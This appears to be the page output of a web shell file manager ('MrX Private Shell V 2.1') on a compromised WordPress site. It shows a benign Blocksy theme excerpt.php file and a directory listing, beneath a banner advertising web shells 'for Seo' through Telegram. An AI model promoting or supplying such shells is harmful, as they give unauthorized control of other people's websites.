__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
defined('ABSPATH') || die("Don't run this file directly!");
if (! function_exists('blocksy_excerpt_length')) {
function blocksy_excerpt_length($length) {
return 300;
}
}
if (! function_exists('blocksy_excerpt_more')) {
function blocksy_excerpt_more($more) {
return '…';
}
}
if (! function_exists('blocksy_trim_excerpt')) {
function blocksy_trim_excerpt($excerpt, $length) {
$text = $excerpt;
if ($length !== 'original') {
$string_helpers = new \Blocksy\StringHelpers($excerpt);
$text = $string_helpers->trim_words($length);
}
foreach (wp_extract_urls($text) as $url) {
$text = str_replace($url, '', $text);
}
$text = apply_filters('blocksy:excerpt:output', $text);
add_filter(
'excerpt_more',
'blocksy_excerpt_more',
PHP_INT_MAX
);
echo apply_filters('the_excerpt', $text);
remove_filter(
'excerpt_more',
'blocksy_excerpt_more',
PHP_INT_MAX
);
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| comments.php | File | 8.38 KB | 0640 |
|
| content-helpers.php | File | 10.92 KB | 0640 |
|
| excerpt.php | File | 924 B | 0640 |
|
| page-elements.php | File | 4.9 KB | 0640 |
|
| related-posts.php | File | 6.72 KB | 0640 |
|
| single-helpers.php | File | 20.45 KB | 0640 |
|